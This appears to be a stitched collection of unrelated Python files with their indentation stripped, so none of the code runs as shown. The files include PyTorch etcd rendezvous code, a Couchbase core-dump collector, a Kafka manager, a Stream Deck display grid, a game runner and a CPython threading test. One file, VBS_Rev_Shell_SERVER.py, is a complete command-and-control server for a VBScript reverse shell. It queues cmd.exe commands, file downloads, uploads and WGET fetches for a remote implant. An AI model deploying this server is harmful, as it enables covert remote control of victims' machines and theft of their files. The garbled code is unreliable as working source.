prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
            # The 'extra_data' node doesn't exist, or the key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
def _create_etcd_client(params: RendezvousParameters) -> etcd.Client:
"""
Creates a new ``etcd.Client`` from the specified ``RendezvousParameters``.
"""
hostname, port = parse_rendezvous_endpoint(params.endpoint, 2379)
# The communication protocol
protocol = params.config.get("protocol")
if protocol is None:
protocol = "http"
else:
if protocol != "http" and protocol != "https":
raise ValueError("The etcd protocol must be HTTP or HTTPS.")
# The SSL client certificate
ssl_cert = params.config.get("cert")
if ssl_cert is not None:
cert_key = params.config.get("key")
if cert_key is not None:
# The etcd client expects the certificate key as the second element
# of the `cert` tuple.
ssl_cert = (ssl_cert, cert_key)
# The root certificate
ca_cert = params.config.get("cacert")
return etcd.Client(
hostname,
port,
protocol=protocol,
cert=ssl_cert,
ca_cert=ca_cert,
allow_reconnect=True,
)
# Handler for torch.distributed "static" registration
def create_rdzv_handler(params: RendezvousParameters) -> RendezvousHandler:
"""
Usage:
::
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8,
timeout=300,
last_call_timeout=30,
etcd_prefix="custom_prefix",
protocol="https",
cacert="/etc/kubernetes/certs/ca.crt",
cert="/etc/kubernetes/certs/client.crt",
key="/etc/kubernetes/certs/client.key")
# -- or --
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8)
etcd_rdzv_handler = create_etcd_rendezvous_handler(rdzv_params)
Where:
run_id - unique id for this training job instance,
min_nodes - min number of workers expected to join the rendezvous,
max_nodes - max number of workers allowed to join the rendezvous,
                    defaults to min_nodes if not specified.
timeout - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutError is raised otherwise;
                  Default is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol - http (default) or https to access etcd.
cacert - CA cert to access etcd, only makes sense with https.
cert - client cert to access etcd, only makes sense with https.
key - client key to access etcd, only makes sense with https.
"""
client = _create_etcd_client(params)
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
rdzv = EtcdRendezvous(
client=client,
prefix=etcd_prefix,
run_id=params.run_id,
num_min_workers=params.min_nodes,
num_max_workers=params.max_nodes,
timeout=params.get_as_int("timeout", _DEFAULT_TIMEOUT),
last_call_timeout=params.get_as_int("last_call_timeout", _DEFAULT_LAST_CALL_TIMEOUT),
)
return EtcdRendezvousHandler(rdzv_impl=rdzv)
|
getcoredumps.py
|
#!/usr/bin/env python
import getopt
import sys
import os
import time
from threading import Thread
sys.path.append('.')
sys.path.append('lib')
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputParser
def usage(error=None):
print("""\
Syntax: getcoredumps.py [options]
Options
-i <file> Path to .ini file containing cluster information.
-p <key=val,...> Comma-separated key=value info.
Available keys:
path=<file_path> The destination path you want to put your zipped diag file
Example:
getcoredumps.py -i cluster.ini -p path=/tmp/nosql
""")
sys.exit(error)
class Getcoredumps(object):
def __init__(self, server, path):
self.server = server
self.path = path
def run(self):
remote = RemoteMachineShellConnection(self.server)
server_type = 'membase'
if remote.is_couchbase_installed():
server_type = 'couchbase'
stamp = time.strftime("%d_%m_%Y_%H_%M")
try:
info = remote.extract_remote_info()
if info.type.lower() != 'windows':
core_files = []
print("looking for crashes on {0} ... ".format(info.ip))
print("erl_crash files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "erl_crash"))
print("core* files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "core"))
print("core* files under /tmp/")
core_files.extend(remote.file_starts_with("/tmp/", "core"))
print("breakpad *dmp files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_ends_with("/opt/{0}/var/lib/{0}/".format(server_type), ".dmp"))
if core_files:
print("found crashes on {0}: {1}".format(info.ip, core_files))
else:
print("crashes not found on {0}".format(info.ip))
i = 0
for core_file in core_files:
if core_file.find('erl_crash.dump') != -1:
#let's just copy that file back
erl_crash_file_name = "erlang-{0}-{1}.log".format(self.server.ip, i)
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.get_file(remote_path, file_name, os.path.join(self.path, erl_crash_file_name)):
print('downloaded core file : {0}'.format(core_file))
i += 1
elif core_file.find('.dmp') != -1:
breakpad_crash_file_name = "breakpad-{0}-{1}.dmp".format(self.server.ip, i)
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.get_file(remote_path, file_name, os.path.join(self.path, breakpad_crash_file_name)):
print('downloaded breakpad .dmp file : {0}'.format(core_file))
i += 1
else:
command = "/opt/{0}/bin/tools/cbanalyze-core".format(server_type)
core_file_name = "core-{0}-{1}.log".format(self.server.ip, i)
core_log_output = "/tmp/{0}".format(core_file_name)
output, _ = remote.execute_command('{0} {1} -f {2}'.format(command, core_file, core_log_output))
print(output)
remote_path, file_name = os.path.dirname(core_log_output), os.path.basename(core_log_output)
if remote.get_file(remote_path, file_name, os.path.join(self.path, core_file_name)):
print('downloaded core backtrace : {0}'.format(core_log_output))
i += 1
if i > 0:
command = "mkdir -p /tmp/backup_crash/{0};" \
"mv -f /tmp/core* /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/erl_crash.dump* /tmp/backup_crash/{0}; " \
"mv -f /opt/{1}/var/lib/{1}/*.dmp /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/crash/*.dmp /tmp/backup_crash/{0};".\
format(stamp, server_type)
print("put all crashes on {0} in backup folder: /tmp/backup_crash/{1}".format(self.server.ip, stamp))
remote.execute_command(command)
output, error = remote.execute_command("ls -la /tmp/backup_crash/{0}".format(stamp))
for o in output:
print(o)
remote.disconnect()
return True
if remote:
remote.disconnect()
return False
except Exception as ex:
print(ex)
return False
class Clearcoredumps(object):
def __init__(self, server, path):
self.server = server
self.path = path
def run(self):
remote = RemoteMachineShellConnection(self.server)
server_type = 'membase'
if remote.is_couchbase_installed():
server_type = 'couchbase'
stamp = time.strftime("%d_%m_%Y_%H_%M")
try:
info = remote.extract_remote_info()
if info.type.lower() != 'windows':
core_files = []
print("looking for Erlang/Memcached crashes on {0} ... ".format(info.ip))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "erl_crash"))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "core"))
core_files.extend(remote.file_starts_with("/tmp/", "core"))
core_files.extend(remote.file_ends_with("/opt/{0}/var/lib/{0}/crash".format(server_type), ".dmp"))
if core_files:
print("found dumps on {0}: {1}".format(info.ip, core_files))
command = "mkdir -p /tmp/backup_crash/{0};" \
"mv -f /tmp/core* /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/erl_crash.dump* /tmp/backup_crash/{0}; " \
"mv -f /opt/{1}/var/lib/{1}/crash/*.dmp /tmp/backup_crash/{0};".\
format(stamp, server_type)
print("Moved all dumps on {0} to backup folder: /tmp/backup_crash/{1}".format(self.server.ip, stamp))
remote.execute_command(command)
output, error = remote.execute_command("ls -la /tmp/backup_crash/{0}".format(stamp))
for o in output:
print(o)
for core_file in core_files:
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.delete_file(remote_path, file_name):
print('deleted core file : {0}'.format(core_file))
remote.disconnect()
else:
print("dump files not found on {0}".format(info.ip))
if remote:
remote.disconnect()
except Exception as ex:
print(ex)
def main():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p', [])
for o, a in opts:
if o == "-h":
usage()
input = TestInputParser.get_test_input(sys.argv)
if not input.servers:
usage("ERROR: no servers specified. Please use the -i parameter.")
except IndexError:
usage()
except getopt.GetoptError as error:
usage("ERROR: " + str(error))
file_path = input.param("path", ".")
remotes = (Getcoredumps(server, file_path) for server in input.servers)
remote_threads = [Thread(target=remote.run) for remote in remotes]
for remote_thread in remote_threads:
remote_thread.daemon = True
remote_thread.start()
run_time = 0
    while remote_thread.is_alive() and run_time < 1200:
time.sleep(15)
run_time += 15
print("Waiting for another 15 seconds (time-out after 20 min)")
if run_time == 1200:
print("collect core dumps hung on this node. Jumping to next node")
print("collect core dumps info done")
for remote_thread in remote_threads:
remote_thread.join(120)
        if remote_thread.is_alive():
raise Exception("collect core dumps hung on remote node")
if __name__ == "__main__":
main()
|
manager.py
|
import logging
logger = logging.getLogger(__name__)
logger.debug("Loaded " + __name__)
import os
import sys
import signal
from kafka_connector import KafkaConnector
import threading
class Manager(object):
Type = "Manager"
def __init__(self, **kwargs):
super(Manager, self).__init__()
self.behaviour = kwargs.get('behaviour')
self.connector_type = kwargs.get('connector_type')
self.kafka_client_type = kwargs.get('kafka_client_type')
self.kafka_client_config = kwargs.get('kafka_client_config')
self.connected_behaviour = KafkaConnector(
self.behaviour,
kafka_client_type=self.kafka_client_type,
**self.kafka_client_config)
self.signal_map = kwargs.get('signal_map', {})
        # Enable Kafka on SIGUSR1 (10), disable on SIGUSR2 (12)
signal.signal(10, self.receiveSignal)
signal.signal(12, self.receiveSignal)
def run(self):
logger.info("Manager run() called.")
main_connector_thread = threading.Thread(target=self.connected_behaviour.run)
main_connector_thread.start()
def onStart(self):
logger.info("Manager onStart() called.")
def onExit(self):
logger.info("Manager onExit() called.")
# Handling Signals
def receiveSignal(self, signal_number, frame):
print('Received:', signal_number)
if(signal_number in self.signal_map):
f = self.signal_map[signal_number]
f['func'](*f['args'], **f['kwargs'])
        # Enable Kafka on SIGUSR1 (10), disable on SIGUSR2 (12)
        if(signal_number == 10):
            logger.info("Enabling Kafka")
self.connected_behaviour.enable_kafka()
if(signal_number == 12):
logger.info("Disabling Kafka")
self.connected_behaviour.disable_kafka()
def onSignal(self):
logger.info("Manager Signal Handler Initialized.")
logger.info('My PID is:{}'.format(str(os.getpid())))
# Register signals
for k,v in self.signal_map.items():
print("Registering Signal = {}".format(k))
signal.signal(k, self.receiveSignal)
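# A minimal usage sketch (my_behaviour, the Kafka client settings and
# reload_config are hypothetical placeholders for whatever the surrounding
# application provides):
#
#     mgr = Manager(behaviour=my_behaviour,
#                   kafka_client_type="producer",
#                   kafka_client_config={},
#                   signal_map={signal.SIGHUP: {'func': reload_config,
#                                               'args': (), 'kwargs': {}}})
#     mgr.onSignal()   # register the handlers from signal_map
#     mgr.run()        # start the KafkaConnector on a background thread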
|
display_grid.py
|
import threading
from time import sleep, time
from typing import Callable, Dict, List, Optional
from PIL import Image
from StreamDeck.Devices.StreamDeck import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from StreamDeck.Transport.Transport import TransportError
from streamdeck_ui.display.empty_filter import EmptyFilter
from streamdeck_ui.display.filter import Filter
from streamdeck_ui.display.keypress_filter import KeypressFilter
from streamdeck_ui.display.pipeline import Pipeline
class DisplayGrid:
"""
A DisplayGrid is made up of a collection of pipelines, each processing
filters for one individual button display.
"""
_empty_filter: EmptyFilter = EmptyFilter()
"Static instance of EmptyFilter shared by all pipelines"
def __init__(self, lock: threading.Lock, streamdeck: StreamDeck, pages: int, cpu_callback: Callable[[str, int], None], fps: int = 25):
"""Creates a new display instance
:param lock: A lock object that will be used to get exclusive access while enumerating
Stream Decks. This lock must be shared by any object that will read or write to the
Stream Deck.
:type lock: threading.Lock
:param streamdeck: The StreamDeck instance associated with this display
:type streamdeck: StreamDeck
:param pages: The number of logical pages (screen sets)
:type pages: int
:param cpu_callback: A function to call whenever the CPU changes
:type cpu_callback: Callable[[str, int], None]
:param fps: The desired FPS, defaults to 25
:type fps: int, optional
"""
self.streamdeck = streamdeck
# Reference to the actual device, used to update icons
self.size = streamdeck.key_image_format()["size"]
self.serial_number = streamdeck.get_serial_number()
self.pages: Dict[int, Dict[int, Pipeline]] = {}
# A dictionary of lists of pipelines. Each page has
# a list, corresponding to each button.
# Initialize with a pipeline per key for all pages
for page in range(pages):
self.pages[page] = {}
for button in range(self.streamdeck.key_count()):
self.pages[page][button] = Pipeline()
self.current_page: int = -1
self.pipeline_thread: Optional[threading.Thread] = None
self.quit = threading.Event()
self.fps = fps
# Configure the maximum frame rate we want to achieve
self.time_per_frame = 1 / fps
self.lock = lock
self.sync = threading.Event()
self.cpu_callback = cpu_callback
# The sync event allows a caller to wait until all the buttons have been processed
DisplayGrid._empty_filter.initialize(self.size)
def replace(self, page: int, button: int, filters: List[Filter]):
with self.lock:
pipeline = Pipeline()
pipeline.add(DisplayGrid._empty_filter)
for filter in filters:
filter.initialize(self.size)
pipeline.add(filter)
keypress = KeypressFilter()
keypress.initialize(self.size)
pipeline.add(keypress)
self.pages[page][button] = pipeline
def get_image(self, page: int, button: int) -> Image.Image:
with self.lock:
            # REVIEW: Consider returning not the last result, but a thumbnail
# or something that represents the current "static" look of
# a button. This will need to be added to the interface
# of a filter.
return self.pages[page][button].last_result()
def set_keypress(self, button: int, active: bool):
with self.lock:
for filter in self.pages[self.current_page][button].filters:
if isinstance(filter[0], KeypressFilter):
filter[0].active = active
def synchronize(self):
# Wait until the next cycle is complete.
# To *guarantee* that you have one complete pass, two waits are needed.
# The first gets you to the end of one cycle (you could have called it
# mid cycle). The second gets you one pass through. Worst case, you
# do two full cycles. Best case, you do 1 full and one partial.
self.sync.wait()
self.sync.wait()
def _run(self):
"""Method that runs on background thread and updates the pipelines."""
frames = 0
start = time()
last_page = -1
execution_time = 0
frame_cache = {}
        while not self.quit.is_set():
current_time = time()
with self.lock:
page = self.pages[self.current_page]
force_update = False
if last_page != page:
                # When a page switch happens, force the pipelines to redraw so icons update
force_update = True
last_page = page
pipeline_cache_count = 0
for button, pipeline in page.items():
# Process all the steps in the pipeline and return the resulting image
with self.lock:
image, hashcode = pipeline.execute(current_time)
pipeline_cache_count += len(pipeline.output_cache)
# If none of the filters in the pipeline yielded a change, use
# the last known result
if force_update and image is None:
image = pipeline.last_result()
if image:
# We cannot afford to do this conversion on every final frame.
                    # Since we want the flexibility of a pipeline engine that can mutate the
                    # images along a chain of filters, the outcome can be somewhat unpredictable.
                    # For example - a clock that changes time or an animation that changes
                    # the frame and font that overlays. In many instances there is a finite
                    # number of frames per pipeline (a looping GIF with image, a pulsing icon etc).
                    # Some may also have virtually infinite mutations. A cache per pipeline
                    # with a policy of evicting the oldest entries would likely suffice.
                    # The main problem is that, since the pipeline can mutate, it's too expensive to
# calculate the actual hash of the final frame.
# Create a hash function that the filter itself defines. It has to
# update the hashcode with the unique attributes of the input it requires
# to make the frame. This could be time, text, frame number etc.
# The hash can then be passed to the next step and XOR'd or combined
# with the next hash. This yields a final hash code that can then be
# used to cache the output. At the end of the pipeline the hash can
# be checked and final bytes will be ready to pipe to the device.
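                    # A possible shape for that per-filter hashing (sketch only; cache_key()
                    # is a hypothetical method, not part of the current Filter interface):
                    #
                    #     hashcode = 0
                    #     for step in pipeline.filters:
                    #         hashcode = hash((hashcode, step[0].cache_key(current_time)))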
# FIXME: This will be unbounded, old frames will need to be evicted
if hashcode not in frame_cache:
image = PILHelper.to_native_format(self.streamdeck, image)
frame_cache[hashcode] = image
else:
image = frame_cache[hashcode]
try:
with self.lock:
self.streamdeck.set_key_image(button, image)
except TransportError:
# Review - deadlock if you wait on yourself?
self.stop()
pass
return
self.sync.set()
self.sync.clear()
# Calculate how long we took to process the pipeline
elapsed_time = time() - current_time
execution_time += elapsed_time
# Calculate how much we have to sleep between processing cycles to maintain the desired FPS
# If we have less than 5ms left, don't bother sleeping, as the context switch and
# overhead of sleeping/waking up is consumed
time_left = self.time_per_frame - elapsed_time
if time_left > 0.005:
sleep(time_left)
frames += 1
if time() - start > 1.0:
execution_time_ms = int(execution_time * 1000)
if self.cpu_callback:
self.cpu_callback(self.serial_number, int(execution_time_ms / 1000 * 100))
# execution_time_ms = int(execution_time * 1000)
# print(f"FPS: {frames} Execution time: {execution_time_ms} ms Execution %: {int(execution_time_ms/1000 * 100)}")
# print(f"Output cache size: {len(frame_cache)}")
# print(f"Pipeline cache size: {pipeline_cache_count}")
execution_time = 0
frames = 0
start = time()
def set_page(self, page: int):
"""Switches to the given page. Pipelines for that page starts running,
other page pipelines stop.
Args:
page (int): The page number to switch to.
"""
with self.lock:
if self.current_page > 0:
# Ensure none of the button filters are active anymore
old_page = self.pages[self.current_page]
for _, pipeline in old_page.items():
for filter in pipeline.filters:
if isinstance(filter[0], KeypressFilter):
filter[0].active = False
# REVIEW: We could detect the active key on the last page, and make it active
# on the target page
self.current_page = page
def start(self):
if self.pipeline_thread is not None:
self.quit.set()
try:
self.pipeline_thread.join()
except RuntimeError:
pass
self.quit.clear()
self.pipeline_thread = threading.Thread(target=self._run)
self.pipeline_thread.daemon = True
self.pipeline_thread.start()
self.synchronize()
# Wait for first frames to become ready
def stop(self):
if self.pipeline_thread is not None:
self.quit.set()
try:
self.pipeline_thread.join()
except RuntimeError:
pass
self.pipeline_thread = None
|
main.py
|
import os
import sys
import threading
from argparse import ArgumentParser
from time import sleep, time
import settings as s
from environment import BombeRLeWorld, GenericWorld
from fallbacks import pygame, tqdm, LOADED_PYGAME
from replay import ReplayWorld
# Function to run the game logic in a separate thread
def game_logic(world: GenericWorld, user_inputs, args):
last_update = time()
while True:
now = time()
if args.turn_based and len(user_inputs) == 0:
sleep(0.1)
continue
elif world.gui is not None and (now - last_update < args.update_interval):
sleep(args.update_interval - (now - last_update))
continue
last_update = now
if world.running:
world.do_step(user_inputs.pop(0) if len(user_inputs) else 'WAIT')
def main(argv = None):
parser = ArgumentParser()
subparsers = parser.add_subparsers(dest='command_name', required=True)
# Run arguments
play_parser = subparsers.add_parser("play")
agent_group = play_parser.add_mutually_exclusive_group()
agent_group.add_argument("--my-agent", type=str, help="Play agent of name ... against three rule_based_agents")
agent_group.add_argument("--agents", type=str, nargs="+", default=["rule_based_agent"] * s.MAX_AGENTS, help="Explicitly set the agent names in the game")
play_parser.add_argument("--train", default=0, type=int, choices=[0, 1, 2, 3, 4],
help="First … agents should be set to training mode")
play_parser.add_argument("--continue-without-training", default=False, action="store_true")
# play_parser.add_argument("--single-process", default=False, action="store_true")
play_parser.add_argument("--n-rounds", type=int, default=10, help="How many rounds to play")
play_parser.add_argument("--save-replay", const=True, default=False, action='store', nargs='?', help='Store the game as .pt for a replay')
play_parser.add_argument("--no-gui", default=False, action="store_true", help="Deactivate the user interface and play as fast as possible.")
# Replay arguments
replay_parser = subparsers.add_parser("replay")
replay_parser.add_argument("replay", help="File to load replay from")
# Interaction
for sub in [play_parser, replay_parser]:
sub.add_argument("--fps", type=int, default=15, help="FPS of the GUI (does not change game)")
sub.add_argument("--turn-based", default=False, action="store_true",
help="Wait for key press until next movement")
sub.add_argument("--update-interval", type=float, default=0.1,
help="How often agents take steps (ignored without GUI)")
sub.add_argument("--log_dir", type=str, default=os.path.dirname(os.path.abspath(__file__)) + "/logs")
# Video?
sub.add_argument("--make-video", default=False, action="store_true",
help="Make a video from the game")
args = parser.parse_args(argv)
if args.command_name == "replay":
args.no_gui = False
args.n_rounds = 1
has_gui = not args.no_gui
if has_gui:
if not LOADED_PYGAME:
raise ValueError("pygame could not loaded, cannot run with GUI")
pygame.init()
# Initialize environment and agents
if args.command_name == "play":
agents = []
if args.train == 0 and not args.continue_without_training:
args.continue_without_training = True
if args.my_agent:
agents.append((args.my_agent, len(agents) < args.train))
args.agents = ["rule_based_agent"] * (s.MAX_AGENTS - 1)
for agent_name in args.agents:
agents.append((agent_name, len(agents) < args.train))
world = BombeRLeWorld(args, agents)
elif args.command_name == "replay":
world = ReplayWorld(args)
else:
raise ValueError(f"Unknown command {args.command_name}")
# Emulate Windows process spawning behaviour under Unix (for testing)
# mp.set_start_method('spawn')
user_inputs = []
# Start game logic thread
t = threading.Thread(target=game_logic, args=(world, user_inputs, args), name="Game Logic")
t.daemon = True
t.start()
# Run one or more games
for _ in tqdm(range(args.n_rounds)):
if not world.running:
world.ready_for_restart_flag.wait()
world.ready_for_restart_flag.clear()
world.new_round()
# First render
if has_gui:
world.render()
pygame.display.flip()
round_finished = False
last_frame = time()
user_inputs.clear()
# Main game loop
while not round_finished:
if has_gui:
# Grab GUI events
for event in pygame.event.get():
if event.type == pygame.QUIT:
if world.running:
world.end_round()
world.end()
return
elif event.type == pygame.KEYDOWN:
key_pressed = event.key
if key_pressed in (pygame.K_q, pygame.K_ESCAPE):
world.end_round()
if not world.running:
round_finished = True
# Convert keyboard input into actions
if s.INPUT_MAP.get(key_pressed):
if args.turn_based:
user_inputs.clear()
user_inputs.append(s.INPUT_MAP.get(key_pressed))
# Render only once in a while
if time() - last_frame >= 1 / args.fps:
world.render()
pygame.display.flip()
last_frame = time()
else:
sleep_time = 1 / args.fps - (time() - last_frame)
if sleep_time > 0:
sleep(sleep_time)
elif not world.running:
round_finished = True
else:
# Non-GUI mode: poll for the end of the round every 1 ms
sleep(0.001)
world.end()
if __name__ == '__main__':
main()
|
VBS_Rev_Shell_SERVER.py
|
# https://github.com/bitsadmin/ReVBShell
#
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import sys
from Queue import Queue
from threading import Thread
from shutil import copyfile, rmtree
import ntpath
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
# File download
if self.path.startswith('/f/'):
# Compile path
filename = ntpath.basename(self.path)
filepath = './upload/%s' % filename
# 404 if no valid file
if not os.path.exists(filepath):
self.send_error(404)
return
# Return file
with open(filepath, 'rb') as f:
self.send_response(200)
self.send_header('content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(f.read())
# Remove file from disk
os.remove(filepath)
return
if commands.empty():
content = 'NOOP'
else:
content = commands.get()
# Return result
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(content)
return
# Result from executing command
def do_POST(self):
global context
# File upload
form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD': 'POST'})
cmd_data = form['cmd'].file.read()
result_filename = form['result'].filename
result_data = form['result'].file.read()
# Show '> ' command input string after command output
if context:
cmd_data = cmd_data.replace(context + ' ', '')
print cmd_data
# Store file
if self.path == '/upload':
# Create folder if required
if not os.path.exists('Downloads'):
os.mkdir('Downloads')
# Write file to disk
with file(os.path.join('Downloads', result_filename), 'wb') as f:
f.write(result_data)
print 'File \'%s\' downloaded.' % result_filename
# Print output
else:
print result_data
sys.stdout.write('%s> ' % context)
# Respond
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write('OK')
return
# Do not write log messages to console
def log_message(self, format, *args):
return
def run_httpserver():
#commands.put('GET C:\\secret.bin')
#commands.put('SHELL dir C:\\')
#commands.put('SHELL type client.vbs')
global server
server = HTTPServer(('', PORT_NUMBER), myHandler)
server.serve_forever()
commands = Queue()
server = None
context = ''
variables = {}
def main():
# Start HTTP server thread
#run_httpserver() # Run without threads for debugging purposes
httpserver = Thread(target=run_httpserver)
httpserver.start()
# Loop to add new commands
global context, variables
s = ''
while True:
s = raw_input('%s> ' % context)
s = s.strip()
splitcmd = s.split(' ', 1)
cmd = splitcmd[0].upper()
# In a context
if context == 'SHELL' and cmd != 'CD':
cmd = context
if s.upper() == 'EXIT':
context = ''
continue
else:
args = s
# Ignore empty commands
if not args:
continue
# No context
else:
args = ''
if len(splitcmd) > 1:
args = splitcmd[1]
# Ignore empty commands
if not cmd:
continue
# UPLOAD
elif cmd == 'UPLOAD':
args = args.strip("\"")
# Check file existence
if not os.path.exists(args):
print 'File not found: %s' % args
continue
# Check if LHOST variable is set
if 'LHOST' not in variables:
print 'Variable LHOST not set'
continue
lhost = variables['LHOST']
# Create folder if required
if not os.path.exists('upload'):
os.mkdir('upload')
# Copy file
filename = ntpath.basename(args)
copyfile(args, './upload/%s' % filename)
# Update command and args
cmd = 'WGET'
args = 'http://%s:%d/f/%s' % (lhost, PORT_NUMBER, filename)
# UNSET
elif cmd == 'UNSET':
if args.upper() in variables:
del variables[args.upper()]
continue
# SHELL
elif cmd == 'SHELL' and not args:
context = 'SHELL'
continue
# SET
elif cmd == 'SET':
if args:
(variable, value) = args.split(' ', 1)
variables[variable.upper()] = value
else:
print '\n'.join('%s: %s' % (key, value) for key,value in variables.iteritems())
continue
# HELP
elif cmd == 'HELP':
print 'Supported commands:\n' \
'- CD [directory] - Change directory. Shows the current directory when called without a parameter.\n' \
'- DOWNLOAD [path] - Download the file at [path] to the .\\Downloads folder.\n' \
'- GETUID - Get shell user id.\n' \
'- GETWD - Get working directory. Same as CD.\n' \
'- HELP - Show this help.\n' \
'- IFCONFIG - Show network configuration.\n' \
'- KILL - Stop script on the remote host.\n' \
'- PS - Show process list.\n' \
'- PWD - Same as GETWD and CD.\n' \
'- SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77.\n' \
' When entered without parameters, it shows the currently set variables.\n' \
'- SHELL [command] - Execute command in cmd.exe interpreter;\n' \
' When entered without command, switches to SHELL context.\n' \
'- SHUTDOWN - Exit this command-line interface (does not shut down the client).\n' \
'- SYSINFO - Show system information.\n' \
'- SLEEP [ms] - Set client polling interval;\n' \
' When entered without ms, shows the current interval.\n' \
'- UNSET [name] - Unset a variable\n' \
'- UPLOAD [localpath] - Upload the file at [localpath] to the remote host.\n' \
' Note: Variable LHOST is required.\n' \
'- WGET [url] - Download file from url.\n'
continue
# SHUTDOWN
elif cmd == 'SHUTDOWN':
server.shutdown()
if os.path.exists('./upload'):
rmtree('./upload')
print 'Shutting down %s' % os.path.basename(__file__)
exit(0)
commands.put(' '.join([cmd, args]))
if __name__ == '__main__':
main()
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import threading
import unittest
from unittest import mock
from test.support import (verbose, run_unittest)
from test.support.import_helper import forget
from test.support.os_helper import (TESTFN, unlink, rmtree)
from test.support import threading_helper
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
def mock_register_at_fork(func):
# bpo-30599: Mock os.register_at_fork() when importing the random module,
# since this function doesn't allow to unregister callbacks and would leak
# memory.
return mock.patch('os.register_at_fork', create=True)(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
@mock_register_at_fork
def check_parallel_module_init(self, mock_os):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
with threading_helper.start_threads(
threading.Thread(target=task, args=(N, done, done_tasks, errors,))
for i in range(N)):
pass
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
